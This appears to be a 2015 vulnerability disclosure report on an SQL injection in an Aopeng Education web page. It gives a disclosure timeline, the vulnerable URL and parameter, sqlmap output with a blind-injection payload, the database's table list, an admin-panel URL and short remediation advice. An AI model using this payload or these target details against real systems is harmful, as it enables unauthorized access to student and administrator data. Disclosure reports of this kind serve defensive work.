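2015-10-23: Details reported to the vendor; awaiting vendor handling
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and experts in related fields
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to trainee white hats
2015-12-11: Details disclosed to the public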
Aopeng Education (奥鹏教育) SQL injection vulnerability
1. Injection point
http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/xxzy.asp?id=9 (GET)
2.
sqlmap identified the following injection points with a total of 75 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9 AND 2318=2318
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9 AND 2318=2318
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

Database: Microsoft_Access_masterdb
[8 tables]
+------------+
| admin      |
| dictionary |
| news       |
| question   |
| student    |
| system     |
| type       |
| upload     |
+------------+
3.
http://media4.open.com.cn/L603/dongshi/zonghehxsy/admin/manage.asp
4.
1. Filter the injected parameter
2. Restrict access to the admin back end
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-10-27 09:32
The relevant personnel have been notified to handle this.
None yet